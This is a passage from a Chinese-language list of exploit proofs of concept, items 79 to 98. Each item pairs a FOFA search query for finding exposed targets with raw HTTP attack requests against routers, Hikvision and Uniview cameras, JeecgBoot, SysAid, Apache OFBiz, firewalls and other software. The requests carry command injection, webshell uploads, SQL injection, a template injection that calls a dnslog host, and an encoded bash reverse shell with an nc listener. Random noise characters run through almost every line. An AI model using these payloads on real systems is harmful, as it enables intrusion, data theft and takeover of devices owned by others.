. A& D! `% X$ n8 _7 k- u& p( mContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
# U" {* ^& T* [ s7 ?- N. WContent-Type: image/png
5 w$ z4 b2 p! c9 b+ d4 q% ^/ U( {$ U4 L' k
YsOxWxSvj1KyZow1PTsh98fdu6l
+ d+ C# b7 ]& m------YsOxWxSvj1KyZow1PTsh98fdu6l
4 h' I5 A$ T. ]+ z5 ?6 wContent-Disposition: form-data; name="target"3 r& |9 Q6 |. e1 t G
3 i/ @2 F2 o0 v/Applications/SkillDevelopAndEHS/4 O3 Z4 A$ N: y7 D2 U7 o
------YsOxWxSvj1KyZow1PTsh98fdu6l--
: b$ V+ L1 C. [" m. b3 O5 j, ~: H8 y0 l
' w0 e5 U( k1 U3 d2 P- G, [GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
# k$ p$ k) p/ W; QHost: x.x.x.x+ h. C( j0 X! `4 q6 j( G x0 e
- ?% F* D# f* |! v0 w1 J; E. A" G, ?3 H3 M/ s4 B
79. BYTEVALUE 百为流控路由器远程命令执行' F: @. o, U( L
FOFA:BYTEVALUE 智能流控路由器7 v+ k% W6 [/ k$ L& y7 D& u
GET /goform/webRead/open/?path=|id HTTP/1.12 Q/ C; p" N; z ]2 f
Host:IP
/ `9 K2 ^# f; R7 O1 |; wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0, B( c" y0 H6 y# L" i, I+ d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% S4 I+ k c' K1 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 v3 d o7 M+ o% yAccept-Encoding: gzip, deflate( s& S! C: j( `2 A: u; U: U
Connection: close
! _3 {- I: e+ i# c6 C8 MUpgrade-Insecure-Requests: 1( i2 P6 @4 I; f+ `3 ?
2 S% h8 s6 U. S: h% y
2 t& Q7 }, b4 n1 e( o! f80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 b7 H/ q/ M" w7 z. l
FOFA:app="速达软件-公司产品"
) b2 e7 m+ v' g7 b: h+ b2 wPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1" @, W9 [9 i5 [5 ~
Host: x.x.x.x
8 i( U% L+ ^$ l/ BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 t& X+ s6 e5 d# f; ]& Q7 q3 g
Content-Length: 27; X7 \& f1 ]6 F7 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. b4 e9 K4 R8 o, ]# Q. U9 a
Accept-Encoding: gzip, deflate
) U6 w E/ A2 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 Y6 n# N6 L7 S h& ]5 F
Connection: close
% K3 j0 c' Z2 `5 T2 [Content-Type: application/octet-stream
5 H* g ^" _- z# w3 z# ~6 j% SUpgrade-Insecure-Requests: 1) ?; W) r7 i* c5 G$ y2 R/ E. [
/ j) ~, @1 I2 P3 s: G1 D
<% out.print("oessqeonylzaf");%>% `( t& }' x6 ^( ~1 J5 r4 U
* U q2 h" ^! _! s* ^. b- H( A4 S5 F3 e# k7 o I. s/ _9 `8 c7 `
GET /xykqmfxpoas.jsp HTTP/1.1
( Q2 W j# I7 g8 G: ]Host: x.x.x.x
) j* u$ X5 Y2 j& z+ c+ k9 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ G+ v- w9 R7 ? J1 w* M0 h) |
Connection: close
4 G" Y/ ~3 G) Y6 O mAccept-Encoding: gzip
" v+ O! C+ T" j
( W$ s+ I: Q( O3 U. O2 L& j* y- S, b5 s* p
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
! Q+ g/ i I. o& _2 g; Z4 U6 `9 XFOFA:app="uniview-视频监控"# u2 f% s+ ^- r3 |/ u# G7 l0 ?+ X
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( |' L" a9 Z& Y {, A# mHost: x.x.x.x- a8 N$ ]: S1 m; \& ]8 O- R8 b) ~# U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ n! i# v6 {7 LConnection: close! H0 X* e) ]: H" {' o2 S, V4 B
Accept-Encoding: gzip8 t3 F! U, r" O* U
& Z! m( q/ A) N$ R8 X* S- T
/ K: l! j, y! n
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行# c7 q- L9 k% l8 a
FOFA:app="思福迪-LOGBASE". a* A4 ]3 X# _/ f6 x
POST /bhost/test_qrcode_b HTTP/1.1
' j$ V5 q, F+ t/ l1 E, jHost: BaseURL
9 x; S; f1 Q# o1 w6 L; f( L3 l) GUser-Agent: Go-http-client/1.1 G( N( u [- {- ]2 r) M7 |0 U, R
Content-Length: 23
, `8 x8 P! s7 y- P9 D4 }Accept-Encoding: gzip2 L" f Q" c$ p# S2 @
Connection: close, _8 }2 n% O7 l% z3 X
Content-Type: application/x-www-form-urlencoded3 P* f& ~4 m1 x& y4 g" w W
Referer: BaseURL
$ d8 J4 T+ Q- M* X! N: v
( x+ Q& g9 x; u/ r5 ^& @$ Cz1=1&z2="|id;"&z3=bhost% J5 i- J4 h/ d8 `* W
$ h7 z R8 w |& n& K
( T) L7 F1 ^; p" U" O; i
83. JeecgBoot testConnection 远程命令执行 U8 D% S; t, y
FOFA:title=="JeecgBoot 企业级低代码平台"6 {+ i0 d C) i; L- H8 \
x3 B$ W3 o8 u) R
Q; X, S5 y" J/ `POST /jmreport/testConnection HTTP/1.1& |' r) M) D; _: c3 t6 P. ~
Host: x.x.x.x, F! C2 v& U) N0 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! G# h* [% K/ F& W) n& k
Connection: close
% W7 A2 b! a: J3 |9 m1 qContent-Length: 8881
- i6 }. n4 O- ^' Y& A) `Accept-Encoding: gzip0 m" a, j! H& i0 B9 N q
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 t* x* k1 r+ W. C# ^
Content-Type: application/json
9 P5 W- |" p \3 c" G, p
7 J$ h1 o! l- v ^6 OPAYLOAD
# y5 \& r5 `! k0 @1 s
6 d% g! ~4 z( z, `$ q1 S! T84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) p" z0 F* Y8 E& V0 A- R+ XFOFA:title=="JeecgBoot 企业级低代码平台"
' t0 l( M9 k# q2 f3 z0 F* D2 T4 v7 x5 x! F7 L
/ u: f1 d0 M9 j! n- a" \( y) s1 o# l+ }% N6 v
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.11 x. J! a- J4 `; J$ n1 U( V) M
Host: 192.168.40.130:8080
. M# N' @0 ]8 H; t: tUser-Agent: curl/7.88.19 L/ I& R* ]; J9 p6 l, d; |$ y
Content-Length: 156
4 p) R+ g5 m0 P4 S1 D6 Q( GAccept: */*
+ r* ~0 j I5 {" n- a' o) ~' lConnection: close
+ ~: J5 \' ~7 E: @# Z3 m% c% lContent-Type: application/json
. w( Y: z7 ^, r `- _Accept-Encoding: gzip
0 A2 n9 W w! e$ S' f" b8 ?, Q' i" D3 U" }
{
( z: j4 U+ m2 X k: v f7 n: s- w "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",* e0 g* e5 T5 L0 X$ l( L6 `$ p
"type": "0"! M( n" |0 C0 N( P& p( |# h
}
! ]; A6 ~- J9 W8 V2 j
6 b& p; G( [% u# H, q( ^2 \$ P# p
$ s2 {6 j3 v+ u; l85. SysAid On-premise< 23.3.36远程代码执行9 o- k* R) q# N9 V
CVE-2023-472466 c$ N3 I2 V3 X% ^( A* a
FOFA:body="sysaid-logo-dark-green.png"
) r5 U' j, _- n$ G! v( ZEXP数据包如下,注入哥斯拉马2 K' N) U+ ^5 u4 O4 [
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1- V3 C. |( s; i4 [
Host: x.x.x.x- U, P7 A* O( `7 \% r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
b, _2 g, V2 e# N2 UContent-Type: application/octet-stream
% F( n( ]! L9 C8 g! E1 oAccept-Encoding: gzip5 Y& C7 c" i) m7 \. n
% z# S/ F* D G Q& E
PAYLOAD# u# ^+ \$ L8 Z' A; B6 [4 E
* \, w0 O8 _1 {0 s' c9 g回显URL:http://x.x.x.x/userfiles/index.jsp2 K, D! n; R. M2 R# V: B
0 P3 Q) ]& U' i) t$ e
86. 日本tosei自助洗衣机RCE: Q) F i* p' e3 t+ w
FOFA:body="tosei_login_check.php"
1 l- l" x% N- u7 UPOST /cgi-bin/network_test.php HTTP/1.1
( W v `- n2 ^5 ^& t( _Host: x.x.x.x8 S8 |: G' M Y% m7 J, _
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36% X& \% `; x( z0 C$ h
Connection: close l f: I; ^6 U( Y
Content-Length: 441 V, v. x% M0 ^ T/ |- ]
Accept: */*7 z( D# Y y; S* d" s
Accept-Encoding: gzip
: [, L1 u9 E2 m7 lAccept-Language: en
+ d f. f% A( o4 b0 B9 iContent-Type: application/x-www-form-urlencoded
) ?- T- y5 b8 T7 _& D; Z( K- W, M. O B' B& Q8 Q0 C6 I
host=%0acat${IFS}/etc/passwd%0a&command=ping+ c/ s/ Q E ]- e6 P' @1 e
1 O1 b9 T4 ]! A' R* _6 W+ \& U7 f l# F$ Z7 Y. A3 m' W# r
87. 安恒明御安全网关aaa_local_web_preview文件上传/ a/ J# x2 `2 I$ x/ |2 [2 G
FOFA:title="明御安全网关"
) e# Y) E4 p# aPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1- p2 H7 Z0 }9 ~3 N
Host: X.X.X.X
$ [1 V) B) w7 Z- [% }; KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) c! n5 C5 c% AConnection: close
. W9 I6 b3 I. w1 T% cContent-Length: 198
: x* Q2 K4 e- }0 u2 I BAccept-Encoding: gzip" r% I1 M2 c8 u. V
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
; d9 }+ j$ \3 n
. Y* f8 [$ ]8 O2 r; z+ {--qqobiandqgawlxodfiisporjwravxtvd
2 \' T' I4 x$ v. Z" O9 Z$ `8 cContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
3 N, y. f( g$ Y* U/ R' OContent-Type: text/plain* W0 `/ K+ h$ J; W. }( P( r0 p
5 k6 s7 T5 B8 F( C- a1 C: v2ZqGNnsjzzU2GBBPyd8AIA7QlDq
3 R- {1 F+ o' c+ |2 C--qqobiandqgawlxodfiisporjwravxtvd--: s0 a w+ R* j# Q& E+ C6 E4 q
' W7 C4 K$ `8 q$ Z+ c0 U; w; S
* R$ G T n- ~/ z( \+ k, N
/jfhatuwe.php
' j; A' {1 y9 R% x H
3 N% r# V7 `$ ?8 N9 x88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- [2 ^( N7 y3 i# o+ l
FOFA:title="明御安全网关"! ^2 O5 K7 B$ Y& l$ ?7 n
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 Y4 [7 v# j3 D3 M+ \. q! X0 _Host: x.x.x.xx.x.x.x
- U$ \- _1 G6 F" pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 B H. E, X, y: z) }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& O/ W! b6 S1 E9 AAccept-Encoding: gzip, deflate b- a ~2 C( D! j* d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ F+ s7 D9 P! N
Connection: close
% q" C( K0 l8 Z' F7 m2 O" q& p
3 L( b. F, H# h3 `/ y& p5 F
0 g/ _5 S( v3 w' j4 _( v# u/astdfkhl.php
# u9 L8 Z9 k1 {$ Y& }7 x0 D8 y M" @/ I+ K% F
89. 致远互联FE协作办公平台editflow_manager存在sql注入
7 c N, d8 X: z# rFOFA:title="FE协作办公平台" || body="li_plugins_download"
( @% V% @3 }' ]+ g, H0 k% z" bPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
4 `6 z& j- K/ kHost: x.x.x.x! j* S# [" r4 q, A% h2 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
A" h0 m$ n) Q+ z( E# U( BConnection: close) y6 T, N4 p8 m: r* ~6 P6 U
Content-Length: 41
# z' `4 J: a2 C- ^Content-Type: application/x-www-form-urlencoded
. l1 A! h) N+ H" \( WAccept-Encoding: gzip3 o4 A2 `1 W# f% j4 \, l
7 u8 k7 b% {! |' Q7 R) r
option=2&GUID=-1'+union+select+111*222--+
2 E8 [" Q0 ^! O" k: t
) V9 O: }- L; C) L N+ @, b% f. Z; E4 {) E5 Z) L! Y d/ N
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
. `! [$ }, k! A0 ]FOFA:icon_hash="-1830859634"
9 Y5 O0 \' q; R. t- ~: g' K+ o* QPOST /php/ping.php HTTP/1.1
8 ~) I! S: A4 l# [+ s& F! dHost: x.x.x.x' R/ T% c+ f2 c) u! ^: h2 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+ G" u) I C, @6 {4 FContent-Length: 51
/ n6 U$ r1 R; n; d, P. IAccept: application/json, text/javascript, */*; q=0.01
4 M4 ]( ~& X/ x9 iAccept-Encoding: gzip, deflate
" ~0 r B5 w/ _ C. S, YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 S4 Y8 H. q3 L) V* o' I- D* k
Connection: close1 M6 e' @/ Q+ z! p7 x
Content-Type: application/x-www-form-urlencoded
* g0 R8 M w4 L* v2 ^5 Y b+ lX-Requested-With: XMLHttpRequest+ Q0 E { j; U4 s: G9 h
! o1 w; g3 z I$ v5 K8 h
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" m: d/ s6 K* ^/ N- L: \( _* O" U. D. |% C# D/ n% } P
' y3 C7 [2 I; ^6 _+ v$ I
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取- h" L; L! O8 L; G* e8 ]$ o
FOFA:title="综合安防管理平台"
3 \* |6 `2 Y5 Q4 s5 a& @+ U# u8 |GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1- H8 Q: y) y5 m& L% @0 h& u
Host: your-ip
+ ]2 J4 D/ v3 w" f& f5 q5 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 \; O8 P6 {) a9 G
Accept-Encoding: gzip, deflate9 U, I$ V+ G. S$ n- ?4 E+ j
Accept: */** ~8 M; G9 F2 W1 {' t" M
Connection: keep-alive
5 d) W$ ?& _( I2 i8 u+ ]0 e u) R M$ a' b9 h
6 }; F) p, m; c8 }! h0 O" a, {* C9 G5 m: L- J
92. 海康威视运行管理中心session命令执行
& a, I; }# p x( E) v* O" l" v) J1 Q" SFastjson命令执行
9 c: g9 F' O1 i! V6 B) T' R& Ghunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"2 \7 r) y8 D3 S/ z
POST /center/api/session HTTP/1.1" H7 [- A8 y, H
Host:( m8 o. s! g4 Q* A
Accept: application/json, text/plain, */*
% g* A+ c0 D9 r1 q# i+ _Accept-Encoding: gzip, deflate5 w- S/ H2 g$ w3 {. c3 \# N
X-Requested-With: XMLHttpRequest
% i$ m( H3 j6 `/ p' |9 K' zContent-Type: application/json;charset=UTF-8
, y7 }8 o5 F; b4 zX-Language-Type: zh_CN
% p3 L6 C' v% LTestcmd: echo test
: \& Q0 N. }0 y: `4 I+ CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36) r1 G7 g* r% J, s% ^' @9 U
Accept-Language: zh-CN,zh;q=0.9
, f5 Z# h1 \# F! ^7 Z* R6 p' `3 ~Content-Length: 5778
5 H$ Y* j* M# \4 n
' v% Z' U: ]* `/ |PAYLOAD( Z, j. {; t2 F" d
! b0 F L) @! B) ~8 P9 S. f9 m# @1 F. q# ^7 q- h' H) ]2 n; X
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传1 E3 R! }: T3 x2 I+ [+ ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
3 h( R9 ^. f; L5 {; @7 o- `POST /?g=app_av_import_save HTTP/1.1
! x# h& N5 C6 @5 B9 ?Host: x.x.x.x" T$ m+ A" ^& w5 d s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx# j7 K3 X: A9 ?9 n' D) ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 d2 P: ?" D, u5 z/ K
# E' V+ D8 o' m) b n
------WebKitFormBoundarykcbkgdfx
; M6 ]& M# F( u9 J5 f3 ?Content-Disposition: form-data; name="MAX_FILE_SIZE"8 m8 h' Y, F; d1 M5 ?
' Y% ]0 S# M, ^
10000000' t' Y) k, J! |
------WebKitFormBoundarykcbkgdfx d8 x" T% Z- S2 k( A
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
. j' {! f. S) x5 wContent-Type: text/plain( u; [# G/ u0 w/ x3 P) b. v
4 V' D/ S9 I+ A* z, P5 R) Swagletqrkwrddkthtulxsqrphulnknxa. J) Y+ R4 x; Q' {3 d$ \6 |: s
------WebKitFormBoundarykcbkgdfx
) V& ^+ v' C& }& `) ^6 o2 L- m2 i* ]Content-Disposition: form-data; name="submit_post"
+ [& S) S' A. ~' r! `3 G' S. R, i5 i/ |: l
obj_app_upfile8 n. p" \4 Z2 g% e' u( i0 r3 K% s- L. p) E
------WebKitFormBoundarykcbkgdfx b& K: `" g9 g: r$ g
Content-Disposition: form-data; name="__hash__"
! d# N) K) N5 r& ~4 e7 `! o/ ]3 S! h: _2 G" U# t4 a
0b9d6b1ab7479ab69d9f71b05e0e94450 R4 N0 |6 t) ]) ]7 B! m7 B
------WebKitFormBoundarykcbkgdfx--
( K+ `6 p' V. {+ l
+ r3 V$ w1 i0 r4 u) w9 N
9 s+ n: h# Q; f- ?; jGET /attachements/xlskxknxa.txt HTTP/1.12 m# p S$ U! S
Host: xx.xx.xx.xx
8 S* R3 Y! ?* W5 X! ~! }: jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- B, J, G/ y5 b1 D; f
* M4 N0 N9 _2 r9 W
, P1 }& e) B$ g% N$ g7 |94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
3 S, X |2 j+ n3 `$ ?6 V8 [FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="+ |$ K9 |% H% K) z& z+ X+ o
POST /?g=obj_area_import_save HTTP/1.1
7 L8 ^6 r2 m3 X7 _% d9 N# A: E: n. iHost: x.x.x.x' F2 p+ m. U; b) E. ^( o, F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
- X' ? I8 B# N! Y+ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, ]' i3 P& P e: s" o& O
$ B" o9 M3 @* N% I$ o" J- p
------WebKitFormBoundarybqvzqvmt/ k8 j) j R0 D5 i- s$ b0 L
Content-Disposition: form-data; name="MAX_FILE_SIZE"5 M- x# \. I T
% `* g6 g ]0 Z1 O# m& k- u
10000000
. ~" i% p' k, e8 U------WebKitFormBoundarybqvzqvmt$ B7 |4 g! k* P ?% Y
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"; T- c7 c9 u5 t( W, i
Content-Type: text/plain4 V# G9 g: V# h. J& H5 F( ]
# v( Z5 V4 X. T" [9 F- m8 E
pxplitttsrjnyoafavcajwkvhxindhmu
2 i9 S3 e: n5 k+ ?& S------WebKitFormBoundarybqvzqvmt ^. c7 _: ]4 o
Content-Disposition: form-data; name="submit_post"& }( q3 D6 X* J! S- |' ~
) j* @3 S! ?! K: g! T! v9 Vobj_app_upfile4 C' J% H) B6 B( s
------WebKitFormBoundarybqvzqvmt
$ s7 u& d1 V8 U+ \2 [0 PContent-Disposition: form-data; name="__hash__"
+ m2 \. W: Q' M; h6 W. D( ]8 A0 l6 A( }3 `7 r9 x' J: H
0b9d6b1ab7479ab69d9f71b05e0e9445
6 |0 Q8 U A8 q. g------WebKitFormBoundarybqvzqvmt--
( N6 a) o7 Z9 i- }
0 W; X9 n: q4 i! m$ {9 m& \% d8 C I0 ~7 A
4 _3 J. g7 F% K$ G' g* p5 sGET /attachements/xlskxknxa.txt HTTP/1.1' F- j2 Y+ f& ~. d3 `- I/ j3 h
Host: xx.xx.xx.xx
i$ p0 m H* V9 r EUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& F% z1 E0 v/ u# m9 q8 E
* b/ B7 |) Y5 z6 m8 B4 k; W/ z
' L- x& R R, A* |% _! J# \# M" E
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
/ _ f8 j( S0 w5 e, W5 D( z4 TCVE-2023-49070$ l( {1 _, [, q& P$ B
FOFA:app="Apache_OFBiz". l2 |! u; v. O0 Z1 u/ [/ d
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
6 f8 p# R' Z5 ~- e; e5 X- QHost: x.x.x.x6 L" s2 Q+ D+ z1 K @) w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 U3 n: l% }1 d9 f5 }8 Y! DConnection: close! u0 X, s& j3 t7 K
Content-Length: 889+ X# B( A1 B: ^" I( b- }
Content-Type: application/xml
8 m2 X0 b+ [7 Z( cAccept-Encoding: gzip
- O/ d4 ?" ~5 [
# T7 u8 H: D7 N& c* b" C* c<?xml version="1.0"?>
% X5 \ Z5 l: s( c. T( I$ |<methodCall>
0 d- q; B- }5 ^: J' }8 a* N4 I/ R" F8 j& c <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>4 P% v( Y+ O3 t6 O
<params>
9 g) {/ d% t$ v5 w, O2 U <param>8 S0 A, T8 D0 w8 J5 Y I
<value>
, @: }4 j) m6 h B0 D <struct>" m5 r0 x4 I: _* t+ h8 `. k
<member>% [* h# m- j- Q& r
<name>test</name>
. J& n6 U8 Q" u" O! m: j9 c3 G: l <value>
' K$ p6 g2 X4 Q7 M) E <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>- X! b8 q, _% y$ F
</value>
4 p* p+ b4 M, R% e: [ </member>$ d: {% k4 e. j P
</struct>" u3 \) l" ?. f+ ~ O
</value>- L' y. k# l; p* T c
</param>9 Z. E/ A# R4 D. r9 n ^5 `
</params>$ U- S J( ~6 H1 i$ Q L+ e
</methodCall>1 O) r d! \# n$ O' T6 e) [. k5 ~
2 P, m/ t# j1 i0 ~) |# C% e2 y7 g
3 _7 _- x$ ^6 w4 D* M% D6 Z7 k. n用ysoserial生成payload
: F1 P! L& x9 ~; s, {java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
0 W+ L% p1 Z5 x5 n) \ h+ Y2 x' z/ L+ A, b9 Z! T& ]& p
* F5 E2 x0 A3 h2 U5 y. S
将生成的payload替换到上面的POC
6 X9 T$ C/ O+ }& m, ~3 vPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.18 S2 P- I/ U7 [5 S( p
Host: 192.168.40.130:8443( Y7 f5 @- n& p5 T9 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% \$ q# O0 V2 E5 i) bConnection: close
9 y/ r8 L4 a- b9 e6 `- H8 fContent-Length: 889
+ o: e& |* ?. c. q% ]+ TContent-Type: application/xml: q/ _( R% F( G" O( T, m
Accept-Encoding: gzip
( ?( E7 g4 ~6 C2 X+ W
( a$ ]( G% H$ E# g, QPAYLOAD
, o" r; D% z$ w9 O, n D7 K8 p5 ~' N, h2 {( @
96. Apache OFBiz 18.12.11 groovy 远程代码执行
! L+ @, e. P& j% q9 b! V' BFOFA:app="Apache_OFBiz"
3 i0 l' ~8 o. C2 C7 K' WPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
6 V! k2 n. p2 X6 C- U, x1 e/ IHost: localhost:84431 n, c( w. Y4 o/ K( R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# P# ]: S( c/ Z: ^Accept: */*
1 x3 v+ ]8 H; I3 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" j% K/ m& h, M# i6 U. e; QContent-Type: application/x-www-form-urlencoded. a: A ^ K# c1 J5 N0 U2 k, H
Content-Length: 555 [3 l3 {' `% m% \9 n, N, ^
( f. o) v. U/ ?' O7 m3 cgroovyProgram=throw+new+Exception('id'.execute().text);: O# z, ?7 C/ U' r. V; B. R
: X/ S; x1 ?8 d; T- [+ m8 Y
6 Z' W7 r4 J2 S8 k9 d' o+ k
反弹shell
+ y' M# l3 L% L9 g在kali上启动一个监听
, }* ~/ W# v) H7 pnc -lvp 7777
5 _* {& b1 Z1 i, P* a% `; X
; E/ b A" l, f$ ]: VPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; B+ V: Y( D D, D* I5 q5 J
Host: 192.168.40.130:8443
9 Q4 g/ l3 w4 B1 j2 h: p4 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ G; _3 L$ N7 d$ gAccept: */*
6 d6 `( n) }. {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ {; d: W9 e" S2 y6 b N2 dContent-Type: application/x-www-form-urlencoded( @5 u4 q$ f, @9 \4 D
Content-Length: 71
* r. w, J: o/ u8 x/ F# D% {& c4 Z0 \' E, w9 K# S9 V4 G4 p
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
( y; w5 r$ U7 U) o% @4 f
! q: _1 y& b; r$ S6 Z( O97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行3 D7 \& X( Q% z" u* |
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"8 c) Q# }# u: A
GET /passport/login/ HTTP/1.1
6 @5 o1 {4 \) ~4 O% f" `Host: 192.168.40.130:8085$ ]" I) y1 P4 n3 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 K ?! z8 P+ b! U/ K7 `Accept-Encoding: gzip; j1 b' z3 b" j, e- }, {! F
Connection: close/ I/ }% g) \- U6 O& h# y' E
Cookie: rememberMe=PAYLOAD
$ _7 h! U$ W2 p2 w( {& SX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"7 p9 Y. w- W4 l. \8 d; N- q7 O
3 t! Y" d' G ]- X4 t& T8 ^; }9 X" C- n; J3 T- l2 U$ y
98. SpiderFlow爬虫平台远程命令执行
